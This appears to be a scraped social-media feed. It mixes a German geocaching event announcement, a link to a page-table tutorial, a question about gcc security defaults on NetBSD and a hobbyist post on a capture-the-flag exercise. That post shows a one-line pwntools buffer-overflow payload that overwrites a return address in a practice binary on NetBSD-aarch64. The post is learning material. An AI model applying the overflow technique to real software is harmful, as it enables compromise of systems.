Save the date: ibug 2026 - 10-jähriges Jubiläum:
Sa 22.08.2026: 10:00 Geocaching-Event:
ibug 2026 (GCBKXVZ), 03525 Riesa
Event-Publish erfolgt reichtzeitig. Fühlt euch eingeladen!
Save the date: ibug 2026 - 10-jähriges Jubiläum:
Sa 22.08.2026: 10:00 Geocaching-Event:
ibug 2026 (GCBKXVZ), 03525 Riesa
Event-Publish erfolgt reichtzeitig. Fühlt euch eingeladen!
A very detailed tutorial from "Joaquin Pinillos"
Walk x86-64 page tables by hand in qemu and gdb. Decompose a virtual address, follow cr3 through all levels of physical memory, and extract a flag from raw bytes.
State of the art AI in 2026 :-)
@netbsd thanks for explainint. then why does a simple "gcc foo.c -o foo" have different security features enabled on NetBSD, FreeBSD, Linux? (no pkgsrc, Makefile or mk/* involved)
I guess having one big switch somewhere in gcc for all of NetBSD's platform would be challenging. Is this kept on the least common denominator on purpose?
pwning NetBSD-aarch64 (ARM)
- http://www.feyrer.de/NetBSD/blog.html/nb_20260308_1932.html
#pwn #binaryexploitation #ctf #cybersecurity #pwntools #gdb #netbsd #arm #aarch64
This afternoon's fun: pwning NetBSD-aarch64 (ARM)
(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | ./win2
What is your name? Hello AAAAAAAAAAAAAAAA�
Goodbye, winner.
(venv-pwn) qnetbsd$ uname -a
NetBSD qnetbsd 11.0_RC2 NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar 4 21:02:00 UTC 2026 [email protected]:/usr/src/sys/arch/evbarm/compile/GENERIC64 evbarm
#pwn #netbsd #binaryexploitation #arm #aarch64 #pwntools #gdb #ctf